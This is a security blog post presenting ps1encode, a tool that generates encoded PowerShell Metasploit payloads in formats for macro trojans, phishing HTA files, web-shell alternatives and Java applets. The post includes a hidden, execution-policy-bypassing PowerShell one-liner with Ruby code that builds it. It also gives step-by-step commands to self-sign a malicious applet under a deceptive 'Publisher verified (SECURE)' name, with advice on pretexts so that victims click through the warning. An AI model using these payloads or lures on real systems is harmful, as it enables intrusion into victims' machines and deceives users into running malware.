PS1ENCODE = POWERSHELL FOR DAYS

I originally planned on writing this blog post after doing my DerbyCon 3.0 talk, where I touched on generating and encoding PowerShell-based payloads. About a year later.. err… here it is 🙂

Since then I’ve made a lot of updates so keep on reading for more details!

— NOTE —
Ps1encode is a tool I wrote that will generate and encode PowerShell-based Metasploit payloads. It relies on the PowerShell code written by Matt Graeber, Dave Kennedy, and a few other contributors (the actual PowerShell shellcode injection piece). Credit to those guys for being awesome.


In order to determine the system architecture in the original ps1encode, I used a simple change-directory batch hack:

cd C:\Windows\SysWOW64\WindowsPowerShell\v1.0 >nul 2>&1 & powershell.exe -NoE -NoP….

If the directory holding the 32-bit version of PowerShell did not exist, the cd failed (its errors are thrown away by >nul 2>&1) and the rest of the line ran the native PowerShell found on PATH, meaning the system is 32-bit. On 64-bit Windows the cd succeeds and cmd picks up powershell.exe from the current directory before searching PATH, so the 32-bit host is launched. Either way the payload ends up in a 32-bit PowerShell process. While this worked, taking this approach became an issue when working with more complex encoders.

While investigating the best way to add the downgrade logic to PowerShell, I ran across Dave Kennedy's Magic Unicorn, which does just that (https://github.com/trustedsec/unicorn – but Python, though.. ew). This version of ps1encode uses Unicorn's PowerShell one-liner shellcode injection code.

Help page:

[screenshot: ps1encode help output]

Currently supported encoders are:

raw => base64 PowerShell code only, without the run options
cmd => default payload – use with .bat files or for an easy copy + paste + shell job
vba => for use with Microsoft Office products for macro trojans
war => for use with Apache Tomcat
exe => executable that calls out to PowerShell and injects the code into it. Requires MinGW to compile
java => for use with Java applet attacks (details on this and the setup instructions below)
php => for use with PHP sites – an alternative to using web shells
hta => HTML Applications – a good alternative to executables in phishing campaigns
cfm => for use with Adobe ColdFusion. Similar to PHP, this is an alternative to using a web shell
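As an added example (my own illustration, not code from ps1encode or Unicorn), here is the encoding behind the raw and cmd encoders together with the SysWOW64 downgrade one-liner from earlier, written in Ruby since that is the language ps1encode itself is written in. The facts it relies on: powershell.exe -EncodedCommand expects base64 of the command encoded as UTF-16LE (not UTF-8), cmd.exe resolves an executable from the current directory before PATH, and cmd.exe refuses command lines over 8191 characters. The specific run options used here (-NoP -NonI -W Hidden -Exec Bypass -Enc) are my choice and may differ from the flags ps1encode emits.

```ruby
# Added example, not ps1encode's own code: build the UTF-16LE base64 blob that
# powershell.exe -EncodedCommand expects, wrap it in the SysWOW64 "downgrade"
# one-liner, and decode such blobs when they show up in logs.

# -EncodedCommand takes base64 of the command encoded as UTF-16LE, not UTF-8.
# Encoding the wrong way gives "The term ... is not recognized" errors because
# PowerShell decodes the bytes as UTF-16 regardless.
def encoded_command(ps_command)
  utf16 = ps_command.encode('UTF-16LE')
  [utf16].pack('m0')          # 'm0' = strict base64, no line breaks
end

# Reverse operation, useful for triaging -enc blobs pulled out of 4688/4104
# event logs during incident response.
def decode_encoded_command(b64)
  raw = b64.unpack1('m0')
  raw.force_encoding('UTF-16LE').encode('UTF-8')
end

# The cmd.exe one-liner. On 64-bit Windows the cd succeeds and cmd resolves
# powershell.exe from the current directory (searched before PATH), so the
# 32-bit host is launched. On 32-bit Windows the cd fails silently and the
# native (32-bit) PowerShell on PATH runs instead. Either way the shellcode
# lands in a 32-bit process.
SYSWOW64_PS = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0'

# Run options are an assumption for this example; ps1encode's exact flags may differ.
def cmd_one_liner(ps_command)
  "cd #{SYSWOW64_PS} >nul 2>&1 & powershell.exe -NoP -NonI -W Hidden " \
    "-Exec Bypass -Enc #{encoded_command(ps_command)}"
end

# cmd.exe rejects command lines longer than 8191 characters, and UTF-16LE plus
# base64 inflates the script to roughly 2.7x its length, so a large injector
# pasted through this path needs to be checked first.
CMD_MAX = 8191

def fits_cmd_line?(one_liner)
  one_liner.length <= CMD_MAX
end

if __FILE__ == $PROGRAM_NAME
  line = cmd_one_liner('dir')
  puts line
  puts "decoded: #{decode_encoded_command(encoded_command('dir'))}"
  puts "fits cmd.exe limit: #{fits_cmd_line?(line)}"
end
```

If the one-liner does not fit, the usual answer is to switch to a stager that downloads the real script, or to one of the file-based encoders above (vba, hta, exe), none of which go through the cmd.exe length limit.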


JAVA
Below are the setup instructions for the Java applet attack:

compile ps1encode java output
javac Java.java

add manifest (the Permissions and Codebase attributes are required before Java 7u51 and later will run a signed applet at all)
echo "Permissions: all-permissions" > /root/Desktop/manifest.txt
echo "Codebase: *" >> /root/Desktop/manifest.txt
echo "Application-Name: Publisher verified (SECURE)" >> /root/Desktop/manifest.txt
jar cvfm Java.jar /root/Desktop/manifest.txt Java.class

self-sign it
keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass your1337pass
jarsigner -keystore mykeystore -storepass your1337pass -keypass mykeypass -signedjar SignedJava.jar Java.jar signapplet

copy to www directory (local apache for this example)
cp Java.class SignedJava.jar /var/www
echo '<applet width="1" height="1" id="Java Secure" code="Java.class" archive="SignedJava.jar"></applet>' > /var/www/java.html

Upon browsing to our page the applet will load and the victim will be presented with the screen below. While the warning message is more alarming in newer versions of Java, with the right pretext and a relevant application name (and ideally a valid code-signing cert, since a self-signed jar is what triggers the harshest warning) most victims should follow through.

[screenshot: Java security warning dialog shown when the applet loads]

You can download ps1encode from my github – https://github.com/addenial/ps1encode

Enjoy and hack hard!

Piotr Marszalik
@addenial
